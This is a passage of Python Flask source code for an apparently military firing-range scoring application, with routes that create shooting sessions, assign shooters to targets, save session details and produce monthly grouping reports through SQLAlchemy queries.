ten=ten,
gp_len=gp_len
)
@app.route('/generate_ref/' ,methods=['GET', 'POST'])
def generate_ref():
g=None
if request.method == "POST":
data = request.get_json()
paper_ref =data['data']
if (paper_ref == 'New'):
g=0
else:
obj=TPaper_ref.query.scalar()
g= obj.paper_ref
return jsonify(gen=int(g))
@app.route('/create_detail_target_2/', methods=['GET', 'POST'])
def create_detail_target_2():
curdate=time.strftime("%Y-%m-%d")
firer_1 = [row.service_id for row in Shooter.query.all()]
detail_data=TShooting.query.scalar()
return render_template('pages/create_detail_target_2.html',
detail_data=detail_data,
firer_1=firer_1
)
@app.route('/save_target_2/', methods=['GET', 'POST'])
def save_target_2():
r=request.form['tag']
r_object=Shooter.query.filter(Shooter.service_id==r).scalar()
r_id=r_object.id
ses=Session_Detail.query.first()
ses.target_2_id=r_id
db.session.commit()
temp =TShooting.query.first()
temp.target_2_id=r_id
db.session.commit()
return redirect(url_for('individual_score_target_2'))
@app.route('/create_detail_target_1/', methods=['GET', 'POST'])
def create_detail_target_1():
curdate=time.strftime("%Y-%m-%d")
selection=Shooting_Session.query.filter(Shooting_Session.date==curdate).all()
firer_1 = [row.service_id for row in Shooter.query.all()]
return render_template('pages/create_detail_target_1.html',
data=selection,
firer_1=firer_1
)
@app.route('/create_session/', methods=['GET', 'POST'])
def create_session():
try:
data = Shooter.query.all()
rang= Range.query.all()
firearms = Firearms.query.all()
ammunation = Ammunation.query.all()
rang_name = request.form.get('comp_select_4')
fire_name = request.form.get('comp_select_5')
ammu_name = request.form.get('comp_select_6')
form=SessionForm()
if(rang_name is None):
range_id=999
fire_id=999
ammu_id=999
else:
range_id = db.session.query(Range.id).filter(Range.name==rang_name).scalar()
fire_id = db.session.query(Firearms.id).filter(Firearms.name==fire_name).scalar()
ammu_id = db.session.query(Ammunation.id).filter(Ammunation.name==ammu_name).scalar()
if form.validate_on_submit():
shooting=Shooting_Session(
date=form.date.data.strftime('%Y-%m-%d'),
datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
shooting_range_id=range_id,
firearms_id=fire_id,
ammunation_id=ammu_id,
target_distance = form.target_distance.data,
weather_notes = form.weather_notes.data,
comments = form.comments.data,
session_no=form.session_no.data,
occasion=form.occ.data
)
db.session.add(shooting)
db.session.commit()
return redirect(url_for('create_detail_target_1'))
except Exception as e:
return redirect(url_for('error5_505.html'))
return render_template('forms/shooting_form.html', form=form, data =data ,rang=rang , firearmns=firearms, ammunation = ammunation)
@app.route('/monthly_report/',methods=['GET','POST'])
def monthly_report():
year=None
month=None
date_start=None
try:
if request.method=='POST':
month=request.form.get('comp_select')
year = datetime.now().year
if (month == 'October'):
dt_start='-10-01'
dt_end ='-10-31'
str_date_start = str(year)+dt_start
date_start=datetime.strptime(str_date_start, "%Y-%m-%d")
str_date_end = str(year)+dt_end
date_end=datetime.strptime(str_date_end, "%Y-%m-%d")
dat1=db.session.query(Grouping.date,Shooter.service_id,Rank.name,Shooter.name.label('firer'),Shooter.unit,Shooter.brigade,Grouping.detail_no,Grouping.result,Grouping.grouping_length_f,MPI.tendency_text).filter(Grouping.date.between(date_start,date_end), Grouping.firer_id==Shooter.id,Shooter.rank_id==Rank.id and Grouping.date==MPI.date, Grouping.session_id==MPI.session_id,Grouping.firer_id==MPI.firer_id,Grouping.detail_no==MPI.detail_no,Grouping.target_no==MPI.target_no,Grouping.spell_no==MPI.spell_no,Grouping.paper_ref==MPI.paper_ref).all()
elif(month=='January'):
dt_start='-01-01'
dt_end ='-01-31'
str_date_start = str(year)+dt_start
date_start=datetime.strptime(str_date_start, "%Y-%m-%d")
str_date_end = str(year)+dt_end
date_end=datetime.strptime(str_date_end, "%Y-%m-%d")
dat1=db.session.query(Grouping.date,Shooter.service_id,Rank.name,Shooter.name.label('firer'),Shooter.unit,Shooter.brigade,Grouping.detail_no,Grouping.result,Grouping.grouping_length_f,MPI.tendency_text).filter(Grouping.date.between(date_start,date_end), Grouping.firer_id==Shooter.id,Shooter.rank_id==Rank.id and Grouping.date==MPI.date, Grouping.session_id==MPI.session_id,Grouping.firer_id==MPI.firer_id,Grouping.detail_no==MPI.detail_no,Grouping.target_no==MPI.target_no,Grouping.spell_no==MPI.spell_no,Grouping.paper_ref==MPI.paper_ref).all()
elif(month=='February'):
dt_start='-02-01'
dt_end ='-02-28'
str_date_start = str(year)+dt_start
date_start=datetime.strptime(str_date_start, "%Y-%m-%d")
str_date_end = str(year)+dt_end
date_end=datetime.strptime(str_date_end, "%Y-%m-%d")
dat1=db.session.query(Grouping.date,Shooter.service_id,Rank.name,Shooter.name.label('firer'),Shooter.unit,Shooter.brigade,Grouping.detail_no,Grouping.result,Grouping.grouping_length_f,MPI.tendency_text).filter(Grouping.date.between(date_start,date_end), Grouping.firer_id==Shooter.id,Shooter.rank_id==Rank.id and Grouping.date==MPI.date, Grouping.session_id==MPI.session_id,Grouping.firer_id==MPI.firer_id,Grouping.detail_no==MPI.detail_no,Grouping.target_no==MPI.target_no,Grouping.spell_no==MPI.spell_no,Grouping.paper_ref==MPI.paper_ref).all()
elif(month=='March'):
dt_start='-03-01'
dt_end ='-03-31'
str_date_start = str(year)+dt_start
date_start=datetime.strptime(str_date_start, "%Y-%m-%d")
str_date_end = str(year)+dt_end
date_end=datetime.strptime(str_date_end, "%Y-%m-%d")
dat1=db.session.query(Grouping.date,Shooter.service_id,Rank.name,Shooter.name.label('firer'),Shooter.unit,Shooter.brigade,Grouping.detail_no,Grouping.result,Grouping.grouping_length_f,MPI.tendency_text).filter(Grouping.date.between(date_start,date_end), Grouping.firer_id==Shooter.id,Shooter.rank_id==Rank.id and Grouping.date==MPI.date, Grouping.session_id==MPI.session_id,Grouping.firer_id==MPI.firer_id,Grouping.detail_no==MPI.detail_no,Grouping.target_no==MPI.target_no,Grouping.spell_no==MPI.spell_no,Grouping.paper_ref==MPI.paper_ref).all()
elif(month=='April'):
dt_start='-04-01'
dt_end ='-04-30'
str_date_start = str(year)+dt_start
date_start=datetime.strptime(str_date_start, "%Y-%m-%d")
str_date_end = str(year)+dt_end
date_end=datetime.strptime(str_date_end, "%Y-%m-%d")
dat1=db.session.query(Grouping.date,Shooter.service_id,Rank.name,Shooter.name.label('firer'),Shooter.unit,Shooter.brigade,Grouping.detail_no,Grouping.result,Grouping.grouping_length_f,MPI.tendency_text).filter(Grouping.date.between(date_start,date_end), Grouping.firer_id==Shooter.id,Shooter.rank_id==Rank.id and Grouping.date==MPI.date, Grouping.session_id==MPI.session_id,Grouping.firer_id==MPI.firer_id,Grouping.detail_no==MPI.detail_no,Grouping.target_no==MPI.target_no,Grouping.spell_no==MPI.spell_no,Grouping.paper_ref==MPI.paper_ref).all()
elif(month=='May'):
dt_start='-05-01'
dt_end ='-05-31'
str_date_start = str(year)+dt_start
date_start=datetime.strptime(str_date_start, "%Y-%m-%d")
str_date_end = str(year)+dt_end
date_end=datetime.strptime(str_date_end, "%Y-%m-%d")
dat1=db.session.query(Grouping.date,Shooter.service_id,Rank.name,Shooter.name.label('firer'),Shooter.unit,Shooter.brigade,Grouping.detail_no,Grouping.result,Grouping.grouping_length_f,MPI.tendency_text).filter(Grouping.date.between(date_start,date_end), Grouping.firer_id==Shooter.id,Shooter.rank_id==Rank.id and Grouping.date==MPI.date, Grouping.session_id==MPI.session_id,Grouping.firer_id==MPI.firer_id,Grouping.detail_no==MPI.detail_no,Grouping.target_no==MPI.target_no,Grouping.spell_no==MPI.spell_no,Grouping.paper_ref==MPI.paper_ref).all()
elif(month=='June'):
dt_start='-06-01'
dt_end ='-06-30'
str_date_start = str(year)+dt_start
date_start=datetime.strptime(str_date_start, "%Y-%m-%d")
str_date_end = str(year)+dt_end
date_end=datetime.strptime(str_date_end, "%Y-%m-%d")
dat1=db.session.query(Grouping.date,Shooter.service_id,Rank.name,Shooter.name.label('firer'),Shooter.unit,Shooter.brigade,Grouping.detail_no,Grouping.result,Grouping.grouping_length_f,MPI.tendency_text).filter(Grouping.date.between(date_start,date_end), Grouping.firer_id==Shooter.id,Shooter.rank_id==Rank.id and Grouping.date==MPI.date, Grouping.session_id==MPI.session_id,Grouping.firer_id==MPI.firer_id,Grouping.detail_no==MPI.detail_no,Grouping.target_no==MPI.target_no,Grouping.spell_no==MPI.spell_no,Grouping.paper_ref==MPI.paper_ref).all()
elif(month=='July'):
dt_start='-07-01'
dt_end ='-07-31'
str_date_start = str(year)+dt_start
date_start=datetime.strptime(str_date_start, "%Y-%m-%d")
str_date_end = str(year)+dt_end
date_end=datetime.strptime(str_date_end, "%Y-%m-%d")
dat1=db.session.query(Grouping.date,Shooter.service_id,Rank.name,Shooter.name.label('firer'),Shooter.unit,Shooter.brigade,Grouping.detail_no,Grouping.result,Grouping.grouping_length_f,MPI.tendency_text).filter(Grouping.date.between(date_start,date_end), Grouping.firer_id==Shooter.id,Shooter.rank_id==Rank.id and Grouping.date==MPI.date, Grouping.session_id==MPI.session_id,Grouping.firer_id==MPI.firer_id,Grouping.detail_no==MPI.detail_no,Grouping.target_no==MPI.target_no,Grouping.spell_no==MPI.spell_no,Grouping.paper_ref==MPI.paper_ref).all()
elif(month=='August'):
dt_start='-08-01'
dt_end ='-08-31'
str_date_start = str(year)+dt_start
date_start=datetime.strptime(str_date_start, "%Y-%m-%d")
str_date_end = str(year)+dt_end
date_end=datetime.strptime(str_date_end, "%Y-%m-%d")
dat1=db.session.query(Grouping.date,Shooter.service_id,Rank.name,Shooter.name.label('firer'),Shooter.unit,Shooter.brigade,Grouping.detail_no,Grouping.result,Grouping.grouping_length_f,MPI.tendency_text).filter(Grouping.date.between(date_start,date_end), Grouping.firer_id==Shooter.id,Shooter.rank_id==Rank.id and Grouping.date==MPI.date, Grouping.session_id==MPI.session_id,Grouping.firer_id==MPI.firer_id,Grouping.detail_no==MPI.detail_no,Grouping.target_no==MPI.target_no,Grouping.spell_no==MPI.spell_no,Grouping.paper_ref==MPI.paper_ref).all()
elif(month=='September'):
dt_start='-09-01'
dt_end ='-09-30'
str_date_start = str(year)+dt_start
date_start=datetime.strptime(str_date_start, "%Y-%m-%d")
str_date_end = str(year)+dt_end
date_end=datetime.strptime(str_date_end, "%Y-%m-%d")
dat1=db.session.query(Grouping.date,Shooter.service_id,Rank.name,Shooter.name.label('firer'),Shooter.unit,Shooter.brigade,Grouping.detail_no,Grouping.result,Grouping.grouping_length_f,MPI.tendency_text).filter(Grouping.date.between(date_start,date_end), Grouping.firer_id==Shooter.id,Shooter.rank_id==Rank.id and Grouping.date==MPI.date, Grouping.session_id==MPI.session_id,Grouping.firer_id==MPI.firer_id,Grouping.detail_no==MPI.detail_no,Grouping.target_no==MPI.target_no,Grouping.spell_no==MPI.spell_no,Grouping.paper_ref==MPI.paper_ref).all()
elif(month=='November'):
dt_start='-11-01'
dt_end ='-11-30'
str_date_start = str(year)+dt_start
date_start=datetime.strptime(str_date_start, "%Y-%m-%d")
str_date_end = str(year)+dt_end
date_end=datetime.strptime(str_date_end, "%Y-%m-%d")
dat1=db.session.query(Grouping.date,Shooter.service_id,Rank.name,Shooter.name.label('firer'),Shooter.unit,Shooter.brigade,Grouping.detail_no,Grouping.result,Grouping.grouping_length_f,MPI.tendency_text).filter(Grouping.date.between(date_start,date_end), Grouping.firer_id==Shooter.id,Shooter.rank_id==Rank.id and Grouping.date==MPI.date, Grouping.session_id==MPI.session_id,Grouping.firer_id==MPI.firer_id,Grouping.detail_no==MPI.detail_no,Grouping.target_no==MPI.target_no,Grouping.spell_no==MPI.spell_no,Grouping.paper_ref==MPI.paper_ref).all()
else:
dt_start='-12-01'
dt_end ='-12-31'
str_date_start = str(year)+dt_start
date_start=datetime.strptime(str_date_start, "%Y-%m-%d")
str_date_end = str(year)+dt_end
date_end=datetime.strptime(str_date_end, "%Y-%m-%d")
dat1=db.session.query(Grouping.date,Shooter.service_id,Rank.name,Shooter.name.label('firer'),Shooter.unit,Shooter.brigade,Grouping.detail_no,Grouping.result,Grouping.grouping_length_f,MPI.tendency_text).filter(Grouping.date.between(date_start,date_end), Grouping.firer_id==Shooter.id,Shooter.rank_id==Rank.id and Grouping.date==MPI.date, Grouping.session_id==MPI.session_id,Grouping.firer_id==MPI.firer_id,Grouping.detail_no==MPI.detail_no,Grouping.target_no==MPI.target_no,Grouping.spell_no==MPI.spell_no,Grouping.paper_ref==MPI.paper_ref).all()
return render_template('pages/monthly_report.html', dat1=dat1 ,month=month)
except Exception as e:
return render_template('errors/month_session.html')
return render_template('pages/monthly_report.html')
@app.route('/save_target_1/', methods=['GET', 'POST'])
def save_target_1():
ref_1=None
try:
if request.method == 'POST':
detail_no = request.form['game_id_1']
r=request.form['tag']
r_object=Shooter.query.filter(Shooter.service_id==r).scalar()
r_id=r_object.id
r2_id=999
r3_id=999
r4_id=999
r5_id=999
r6_id=999
r7_id=999
r8_id=999
ref=request.form['business']
set_no = request.form.get('comp_select_6')
shots = request.form['tag_8']
sess=request.form.get('comp_select')
ref_1 = None
paper=db.session.query(TPaper_ref).scalar()
if(ref == ""):
ref_1=paper.paper_ref
else:
ref_1=ref
temp_shooting=db.session.query(TShooting).scalar()
if(temp_shooting is None):
detail_shots =Session_Detail(
date=datetime.now(),
datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
session_id=sess,
detail_no=detail_no,
target_1_id=r_id,
target_2_id=r2_id,
target_3_id=r3_id,
target_4_id=r4_id,
target_5_id=r5_id,
target_6_id=r6_id,
target_7_id=r7_id,
target_8_id=r8_id,
paper_ref=ref_1,
set_no=set_no,
save_flag=0
)
db.session.add(detail_shots)
db.session.commit()
db.session.query(TPaper_ref).delete()
db.session.commit()
ref_db = TPaper_ref(
paper_ref=ref_1,
detail_no=detail_no,
session_no=sess
)
db.session.add(ref_db)
db.session.commit()
Tdetail_shots =TShooting(
date=datetime.now(),
datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
session_id=sess,
detail_no=detail_no,
target_1_id=r_id,
target_2_id=r2_id,
target_3_id=r3_id,
target_4_id=r4_id,
target_5_id=r5_id,
target_6_id=r6_id,
target_7_id=r7_id,
target_8_id=r8_id,
paper_ref=ref_1,
set_no=set_no,
save_flag=0
)
db.session.add(Tdetail_shots)
db.session.commit()
else:
db.session.query(TShooting).delete()
db.session.commit()
db.session.query(TPaper_ref).delete()
db.session.commit()
ref_db = TPaper_ref(
paper_ref=ref_1,
detail_no=detail_no,
session_no=sess
)
db.session.add(ref_db)
db.session.commit()
detail_shots =Session_Detail(
date=datetime.now(),
datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
session_id=sess,
detail_no=detail_no,
target_1_id=r_id,
target_2_id=r2_id,
target_3_id=r3_id,
target_4_id=r4_id,
target_5_id=r5_id,
target_6_id=r6_id,
target_7_id=r7_id,
target_8_id=r8_id,
paper_ref=ref_1,
set_no=set_no,
save_flag=0
)
db.session.add(detail_shots)
db.session.commit()
Tdetail_shots =TShooting(
date=datetime.now(),
datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
session_id=sess,
detail_no=detail_no,
target_1_id=r_id,
target_2_id=r2_id,
target_3_id=r3_id,
target_4_id=r4_id,
target_5_id=r5_id,
target_6_id=r6_id,
target_7_id=r7_id,
target_8_id=r8_id,
paper_ref=ref_1,
set_no=set_no,
save_flag=0
)
db.session.add(Tdetail_shots)
db.session.commit()
except Exception as e:
return redirect(url_for('error_target_1'))
return redirect(url_for('individual_score_target_1'))
@app.route('/FRAS/', methods=['GET', 'POST'])
def load ():
try:
ref_1=None
if request.method == 'POST':
detail_no = request.form['game_id_1']
tmp_list = []
duplicate = False
r=request.form['tag']
if (r== ""):
r_id = 999
else:
r_object=Shooter.query.filter(Shooter.service_id==r).scalar()
r_id=r_object.id
r1=request.form['tag_1']
if(r1== ""):
r1_id=999
else:
r1_object=Shooter.query.filter(Shooter.service_id==r1).scalar()
r1_id=r1_object.id
r2=request.form['tag_2']
if (r2==""):
r2_id=999
else:
r2_object=Shooter.query.filter(Shooter.service_id==r2).scalar()
r2_id=r2_object.id
r3=request.form['tag_3']
if(r3==""):
r3_id=999
else:
r3_object=Shooter.query.filter(Shooter.service_id==r3).scalar()
r3_id=r3_object.id
r4=request.form['tag_4']
if(r4==""):
r4_id=999
else:
r4_object=Shooter.query.filter(Shooter.service_id==r4).scalar()
r4_id=r4_object.id
r5=request.form['tag_5']
if(r5==""):
r5_id=999
else:
r5_object=Shooter.query.filter(Shooter.service_id==r5).scalar()
r5_id=r5_object.id
r6=request.form['tag_6']
if(r6==""):
r6_id=999
else:
r6_object=Shooter.query.filter(Shooter.service_id==r6).scalar()
r6_id=r6_object.id
r7=request.form['tag_7']
if(r7== ""):
r7_id=999
else:
r7_object=Shooter.query.filter(Shooter.service_id==r7).scalar()
r7_id=r7_object.id
ref=request.form['business']
set_no = request.form.get('comp_select_6')
shots = request.form['tag_8']
sess=request.form.get('comp_select')
tmp_list.append(r_id)
tmp_list.append(r1_id)
tmp_list.append(r2_id)
tmp_list.append(r3_id)
tmp_list.append(r4_id)
tmp_list.append(r5_id)
tmp_list.append(r6_id)
tmp_list.append(r7_id)
if ref == None or ref =="":
ref_obj=TPaper_ref.query.scalar()
ref_1=ref_obj.paper_ref
else :
print("Inside ref _4 else")
ref_1=ref
print(ref_1)
print("Inside ref _4 else 1")
if(int(set_no)>5):
print("Inside ref _5 else")
return redirect(url_for('paper_duplicate_error'))
else:
print("Inside TPaper_ref")
db.session.query(TPaper_ref).delete()
print("Inside TPaper_ref")
db.session.commit()
ref_db = TPaper_ref(
paper_ref=ref_1,
detail_no=detail_no,
session_no=sess
)
db.session.add(ref_db)
db.session.commit()
print("Inside load 3")
for i in range(len(tmp_list)):
for j in range(len(tmp_list)):
if(tmp_list[i]== 999 and tmp_list[j]==999):
duplicate = False
elif(i!=j and tmp_list[i]==tmp_list[j]):
duplicate = True
print("temp1")
if(duplicate):
return redirect(url_for('duplicate_firer_error'))
else:
print("temp")
temp=db.session.query(TShooting.save_flag).scalar()
print(temp)
if(temp is None):
print("Inside the temp if")
print(sess)
print(detail_no)
Tdetail_shots =TShooting(
date=datetime.now(),
datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
session_id=sess,
detail_no=detail_no,
target_1_id=r_id,
target_2_id=r1_id,
target_3_id=r2_id,
target_4_id=r3_id,
target_5_id=r4_id,
target_6_id=r5_id,
target_7_id=r6_id,
target_8_id=r7_id,
paper_ref=ref_1,
set_no=set_no,
save_flag=0
)
print(Tdetail_shots)
print("Tdetail_shots")
db.session.add(Tdetail_shots)
db.session.commit()
print(""
)
detail_shots =Session_Detail(
date=datetime.now(),
datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
session_id=sess,
detail_no=detail_no,
target_1_id=r_id,
target_2_id=r1_id,
target_3_id=r2_id,
target_4_id=r3_id,
target_5_id=r4_id,
target_6_id=r5_id,
target_7_id=r6_id,
target_8_id=r7_id,
paper_ref=ref_1,
set_no=set_no,
save_flag=0
)
db.session.add(detail_shots)
db.session.commit()
else:
db.session.query(TShooting).filter(TShooting.id != 999).delete()
db.session.commit()
Tdetail_shots =TShooting(
date=datetime.now(),
datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
session_id=sess,
detail_no=detail_no,
target_1_id=r_id,
target_2_id=r1_id,
target_3_id=r2_id,
target_4_id=r3_id,
target_5_id=r4_id,
target_6_id=r5_id,
target_7_id=r6_id,
target_8_id=r7_id,
paper_ref=ref_1,
set_no=set_no,
save_flag=0
)
db.session.add(Tdetail_shots)
db.session.commit()
detail_shots =Session_Detail(
date=datetime.now(),
datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
session_id=sess,
detail_no=detail_no,
target_1_id=r_id,
target_2_id=r1_id,
target_3_id=r2_id,
target_4_id=r3_id,
target_5_id=r4_id,
target_6_id=r5_id,
target_7_id=r6_id,
target_8_id=r7_id,
paper_ref=ref_1,
set_no=set_no,
save_flag=0
)
db.session.add(detail_shots)
db.session.commit()
except Exception as e:
print(e)
return redirect(url_for('error_2'))
return redirect(url_for('image_process'))
@app.route('/FRAS_1/', methods=['GET', 'POST'])
def load_1 ():
ref_1=None
try:
if request.method == 'POST':
print("This is inside Post")
detail_no = request.form['game_id_1']
print("this is detail_no")
print(detail_no)
tmp_list = []
duplicate = False
gr=session.get('group',None)
data=TGroup.query.filter(TGroup.group_no==gr).scalar()
da_1=data.target_1_no
da_2=data.target_2_no
da_3=data.target_3_no
da_4=data.target_4_no
da_5=data.target_5_no
da_6=data.target_6_no
da_7=data.target_7_no
da_8=data.target_8_no
if(da_1==""):
r_id=999
else:
r=Shooter.query.filter(Shooter.service_id==da_1).scalar()
r_id=r.id
if(da_2==""):
r1_id=999
else:
r1=Shooter.query.filter(Shooter.service_id==da_2).scalar()
r1_id=r1.id
if(da_3==""):
r2_id=999
else:
r2=Shooter.query.filter(Shooter.service_id==da_3).scalar()
r2_id=r2.id
if(da_4==""):
r3_id=999
else:
r3=Shooter.query.filter(Shooter.service_id==da_4).scalar()
r3_id=r3.id
if(da_5==""):
r4_id=999
else:
r4=Shooter.query.filter(Shooter.service_id==da_5).scalar()
r4_id=r4.id
if(da_6==""):
r5_id=999
else:
r5=Shooter.query.filter(Shooter.service_id==da_6).scalar()
r5_id=r5.id
if(da_7==""):
r6_id=999
else:
r6=Shooter.query.filter(Shooter.service_id==da_7).scalar()
r6_id=r6.id
if(da_8==""):
r7_id=999
else:
r7=Shooter.query.filter(Shooter.service_id==da_8).scalar()
r7_id=r7.id
ref=request.form['business']
set_no = request.form.get('comp_select_6')
shots = request.form['tag_8']
sess=request.form.get('comp_select')
tmp_list.append(r_id)
tmp_list.append(r1_id)
tmp_list.append(r2_id)
tmp_list.append(r3_id)
tmp_list.append(r4_id)
tmp_list.append(r5_id)
tmp_list.append(r6_id)
tmp_list.append(r7_id)
print(tmp_list)
if ref == None or ref =="":
ref_obj=TPaper_ref.query.scalar()
ref_1=ref_obj.paper_ref
else :
ref_1=ref
check=TPaper_ref.query.scalar()
cses=check.session_no
det=check.detail_no
if(int(set_no)>5):
return redirect(url_for('paper_duplicate_error'))
else:
db.session.query(TPaper_ref).delete()
db.session.commit()
ref_db = TPaper_ref(
paper_ref=ref_1,
detail_no=detail_no,
session_no=sess
)
db.session.add(ref_db)
db.session.commit()
for i in range(len(tmp_list)):
for j in range(len(tmp_list)):
if(tmp_list[i]== 999 and tmp_list[j]==999):
duplicate = False
elif(i!=j and tmp_list[i]==tmp_list[j]):
duplicate = True
if(duplicate):
return redirect(url_for('duplicate_firer_error'))
else:
temp_shooting=db.session.query(TShooting).scalar()
if(temp_shooting is None):
detail_shots =Session_Detail(
date=datetime.now(),
datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
session_id=sess,
detail_no=detail_no,
target_1_id=r_id,
target_2_id=r1_id,
target_3_id=r2_id,
target_4_id=r3_id,
target_5_id=r4_id,
target_6_id=r5_id,
target_7_id=r6_id,
target_8_id=r7_id,
paper_ref=ref_1,
set_no=set_no,
save_flag=0
)
db.session.add(detail_shots)
db.session.commit()
Tdetail_shots =TShooting(
date=datetime.now(),
datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
session_id=sess,
detail_no=detail_no,
target_1_id=r_id,
target_2_id=r1_id,
target_3_id=r2_id,
target_4_id=r3_id,
target_5_id=r4_id,
target_6_id=r5_id,
target_7_id=r6_id,
target_8_id=r7_id,
paper_ref=ref_1,
set_no=set_no,
save_flag=0
)
db.session.add(Tdetail_shots)
db.session.commit()
else:
db.session.query(TShooting).filter(TShooting.id != 999).delete()
db.session.commit()
Tdetail_shots =TShooting(
date=datetime.now(),
datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
session_id=sess,
detail_no=detail_no,
target_1_id=r_id,
target_2_id=r1_id,
target_3_id=r2_id,
target_4_id=r3_id,
target_5_id=r4_id,
target_6_id=r5_id,
target_7_id=r6_id,
target_8_id=r7_id,
paper_ref=ref_1,
set_no=set_no,
save_flag=0
)
db.session.add(Tdetail_shots)
db.session.commit()
detail_shots =Session_Detail(
date=datetime.now(),
datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
session_id=sess,
detail_no=detail_no,
target_1_id=r_id,
target_2_id=r1_id,
target_3_id=r2_id,
target_4_id=r3_id,
target_5_id=r4_id,
target_6_id=r5_id,
target_7_id=r6_id,
target_8_id=r7_id,
paper_ref=ref_1,
set_no=set_no,
save_flag=0
)
db.session.add(detail_shots)
db.session.commit()
except Exception as e:
return redirect(url_for('error_102'))
return redirect(url_for('detail_view'))
@app.route('/FRAS_2/', methods=['GET', 'POST'])
def load_2 ():
ref_1=None
try:
if request.method == 'POST':
print("This is inside Post")
detail_no = request.form['game_id_1']
print("this is detail_no")
print(detail_no)
tmp_list = []
duplicate = False
gr=session.get('group',None)
data=TGroup.query.filter(TGroup.group_no==gr).scalar()
da_1=data.target_1_no
da_2=data.target_2_no
da_3=data.target_3_no
da_4=data.target_4_no
da_5=data.target_5_no
da_6=data.target_6_no
da_7=data.target_7_no
da_8=data.target_8_no
if(da_1==""):
r_id=999
else:
r=Shooter.query.filter(Shooter.service_id==da_1).scalar()
r_id=r.id
if(da_2==""):
r1_id=999
else:
r1=Shooter.query.filter(Shooter.service_id==da_2).scalar()
r1_id=r1.id
if(da_3==""):
r2_id=999
else:
r2=Shooter.query.filter(Shooter.service_id==da_3).scalar()
r2_id=r2.id
if(da_4==""):
r3_id=999
else:
r3=Shooter.query.filter(Shooter.service_id==da_4).scalar()
r3_id=r3.id
if(da_5==""):
r4_id=999
else:
r4=Shooter.query.filter(Shooter.service_id==da_5).scalar()
r4_id=r4.id
if(da_6==""):
r5_id=999
else:
r5=Shooter.query.filter(Shooter.service_id==da_6).scalar()
r5_id=r5.id
if(da_7==""):
r6_id=999
else:
r6=Shooter.query.filter(Shooter.service_id==da_7).scalar()
r6_id=r6.id
if(da_8==""):
r7_id=999
else:
r7=Shooter.query.filter(Shooter.service_id==da_8).scalar()
r7_id=r7.id
ref=request.form['business']
set_no = request.form.get('comp_select_6')
shots = request.form['tag_8']
sess=request.form.get('comp_select')
tmp_list.append(r_id)
tmp_list.append(r1_id)
tmp_list.append(r2_id)
tmp_list.append(r3_id)
tmp_list.append(r4_id)
tmp_list.append(r5_id)
tmp_list.append(r6_id)
tmp_list.append(r7_id)
print(tmp_list)
if ref == None or ref =="":
ref_obj=TPaper_ref.query.scalar()
ref_1=ref_obj.paper_ref
else :
ref_1=ref
check=TPaper_ref.query.scalar()
cses=check.session_no
det=check.detail_no
if(int(set_no)>5):
return redirect(url_for('paper_duplicate_error'))
else:
db.session.query(TPaper_ref).delete()
db.session.commit()
ref_db = TPaper_ref(
paper_ref=ref_1,
detail_no=detail_no,
session_no=sess
)
db.session.add(ref_db)
db.session.commit()
for i in range(len(tmp_list)):
for j in range(len(tmp_list)):
if(tmp_list[i]== 999 and tmp_list[j]==999):
duplicate = False
elif(i!=j and tmp_list[i]==tmp_list[j]):
duplicate = True
if(duplicate):
return redirect(url_for('duplicate_firer_error'))
else:
temp_shooting=db.session.query(TShooting).scalar()
if(temp_shooting is None):
detail_shots =Session_Detail(
date=datetime.now(),
datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
session_id=sess,
detail_no=detail_no,
target_1_id=r_id,
target_2_id=r1_id,
target_3_id=r2_id,
target_4_id=r3_id,
target_5_id=r4_id,
target_6_id=r5_id,
target_7_id=r6_id,
target_8_id=r7_id,
paper_ref=ref_1,
set_no=set_no,
save_flag=0
)
db.session.add(detail_shots)
db.session.commit()
Tdetail_shots =TShooting(
date=datetime.now(),
datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
session_id=sess,
detail_no=detail_no,
target_1_id=r_id,
target_2_id=r1_id,
target_3_id=r2_id,
target_4_id=r3_id,
target_5_id=r4_id,
target_6_id=r5_id,
target_7_id=r6_id,
target_8_id=r7_id,
paper_ref=ref_1,
set_no=set_no,
save_flag=0
)
db.session.add(Tdetail_shots)
db.session.commit()
else:
db.session.query(TShooting).filter(TShooting.id != 999).delete()
db.session.commit()
Tdetail_shots =TShooting(
date=datetime.now(),
datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
session_id=sess,
detail_no=detail_no,
target_1_id=r_id,
target_2_id=r1_id,
target_3_id=r2_id,
target_4_id=r3_id,
target_5_id=r4_id,
target_6_id=r5_id,
target_7_id=r6_id,
target_8_id=r7_id,
paper_ref=ref_1,
set_no=set_no,
save_flag=0
)
db.session.add(Tdetail_shots)
db.session.commit()
detail_shots =Session_Detail(
date=datetime.now(),
datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
session_id=sess,
detail_no=detail_no,
target_1_id=r_id,
target_2_id=r1_id,
target_3_id=r2_id,
target_4_id=r3_id,
target_5_id=r4_id,
target_6_id=r5_id,
target_7_id=r6_id,
target_8_id=r7_id,
paper_ref=ref_1,
set_no=set_no,
save_flag=0
)
db.session.add(detail_shots)
db.session.commit()
except Exception as e:
print(e)
return redirect(url_for('error'))
return redirect(url_for('image_process'))
@app.route('/detail_view/', methods=['GET', 'POST'])
def detail_view():
detail = Session_Detail.query.all()
for details in detail:
details.target_1=Shooter.query.filter(Shooter.id==details.target_1_id).scalar()
details.target_2=Shooter.query.filter(Shooter.id==details.target_2_id).scalar()
details.target_3=Shooter.query.filter(Shooter.id==details.target_3_id).scalar()
details.target_4=Shooter.query.filter(Shooter.id==details.target_4_id).scalar()
details.target_5=Shooter.query.filter(Shooter.id==details.target_5_id).scalar()
details.target_6=Shooter.query.filter(Shooter.id==details.target_6_id).scalar()
details.target_7=Shooter.query.filter(Shooter.id==details.target_7_id).scalar()
details.target_8=Shooter.query.filter(Shooter.id==details.target_8_id).scalar()
return render_template('pages/detail_view.html',detail=detail)
@app.route('/detail_view/detail/<id>', methods=['GET', 'POST'])
def view_detail(id):
